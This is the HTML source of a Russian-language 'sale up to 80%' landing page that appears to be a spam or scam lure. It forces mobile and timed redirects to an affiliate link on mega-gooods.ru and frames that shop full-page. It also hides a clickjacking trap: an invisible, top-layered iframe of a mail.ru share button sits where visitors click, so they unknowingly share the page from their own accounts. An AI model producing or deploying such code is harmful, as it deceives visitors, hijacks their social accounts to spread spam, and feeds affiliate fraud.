<html lang="ru" prefix="og: http://ogp.me/ns/article#" class=" ">
<head>
<title>Скидки до 80%</title>
<meta charset="utf-8"> 
<meta property="og:title" content="Финальная распродажа! Скидки до 80%!">
<meta property="og:description" content="Во всех категориях! Автомобильные аксессуары, красота и здоровье, одежда, часы и аксессуары!">
<meta property="og:image" content="http://gooods.trade/ban.png"/>
<meta name="referrer" content="no-referrer" />
<script src="mobile-detect.min.js"></script>
<script type="text/javascript">
    var md = new MobileDetect(window.navigator.userAgent);
        if (md.mobile()) {
            document.location.href = "http://mega-gooods.ru/shop-sale/?ref=54941&lnk=1178934";
        }
</script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
 
<script src="angular.js"></script>
<script type="text/javascript">
    alert("Внимание! Скидки на все категории товаров!");
</script>
<script type="text/javascript">
          setTimeout("location.href = 'http://mega-gooods.ru/shop-sale/?ref=54941&lnk=1178934';",10000);

    </script>
   

<style>
    body {
        background: #112b47;        
    }
    h1 {
        font-size: 50px;
        color: #fff;
    }
    .saletitle {
        color: #fff;
    }   
    .modal {
    }
    .pixel {
        z-index: 1000000000000000;
        opacity: 0;
        position: absolute;
    }
    .alert {
        z-index: 10000000000;
        text-align: center;
        position: fixed;
        width: 100%;
        height: 7700px;

    }
    .top {
        
        height: 1000px;
        width: 100%;
        
        position: relative;
        text-align: center;


    }
</style>
</head>
<body>
    <div class="alert"><img src="alert3.png" align="top"></div>

   
    <iframe src="http://mega-gooods.ru/shop-sale/?ref=54941&lnk=1178934" width="100%" height="7700px" frameborder="no" scrolling="no"></iframe>
    </div>


 <div style="position:absolute; top:340px; left:51px; width:100px; height:30px; overflow:hidden;" class="pixel" id="pixel">
   
    <iframe style="position:relative; width:442px; height:400px; right:73px; bottom: 331px;" scrolling="no" src="https://connect.mail.ru/share?url=http://goods.trade/sale.html" />

    </div>
</body>
</html>